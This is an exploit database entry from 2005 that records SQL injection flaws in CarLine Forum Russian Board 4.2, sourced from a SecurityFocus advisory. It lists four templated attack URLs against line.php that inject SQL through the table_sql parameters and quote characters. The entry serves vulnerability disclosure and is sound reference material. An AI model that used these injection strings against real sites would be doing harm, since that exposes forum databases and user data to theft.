CarLine Forum Russian Board 4.2 - line.php Multiple SQL Injections

2005-06-23T00:00:00
ID EXPLOITPACK:CA0F5535BE7E9135F3C0841E6252DB2B
Type exploitpack
Reporter 1dt.w0lf
Modified 2005-06-23T00:00:00

Description

CarLine Forum Russian Board 4.2 - line.php Multiple SQL Injections

                                        
                                            source: https://www.securityfocus.com/bid/14045/info
                
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
                
Forum Russian Board 4.2 is reported to be affected. 

line.php?board_user_id=1&board_user_cook=1&table_sql[users]=[SQL]
line.php?table_sql[online]=[SQL]
line.php?table_sql[online]=[DB].[TBL]&board_user_name_us=1'
line.php?table_sql[online]=[DB].[TBL]&board_user_name_us=1&url=1'